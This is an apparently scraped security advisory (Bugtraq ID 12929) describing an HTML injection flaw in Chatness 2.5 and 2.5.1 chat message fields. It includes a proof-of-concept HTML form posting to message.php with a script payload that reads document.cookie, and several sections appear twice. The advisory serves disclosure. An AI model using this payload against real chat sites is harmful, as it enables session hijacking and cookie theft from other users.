Chatness Message Form Field HTML Injection Vulnerability
BID:12929
Info
Chatness Message Form Field HTML Injection Vulnerability
| Bugtraq ID: | 12929 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 29 2005 12:00AM |
| Updated: | Mar 29 2005 12:00AM |
| Credit: | Discovery is credited to 3nitro of PersianHacker Team. |
| Vulnerable: |
Chatness Chatness 2.5.1 Chatness Chatness 2.5 |
| Not Vulnerable: | |
Discussion
Chatness Message Form Field HTML Injection Vulnerability
Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields.
Exploitation will allow an attacker to inject hostile HTML and script code into the session of another user. An attacker could take advantage of this vulnerability to steal cookie-based authentication credentials or launch other attacks.
Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields.
Exploitation will allow an attacker to inject hostile HTML and script code into the session of another user. An attacker could take advantage of this vulnerability to steal cookie-based authentication credentials or launch other attacks.
Exploit / POC
Chatness Message Form Field HTML Injection Vulnerability
The following example was provided:
<html>
<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>
<body>
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/message.php">
<b>XSS in message.php:</b><p>
Username:
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
<p>
<br>
example: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p> </p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
The following example was provided:
<html>
<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>
<body>
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/message.php">
<b>XSS in message.php:</b><p>
Username:
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
<p>
<br>
example: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p> </p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
Solution / Fix
Chatness Message Form Field HTML Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Chatness Message Form Field HTML Injection Vulnerability
References:
References:
- Chatness Homepage (Chatness)
- [PersianHacker.NET 200503-12]Chatness 2.5.1 and prior XSS Vulnerabilities (PersianHacker Team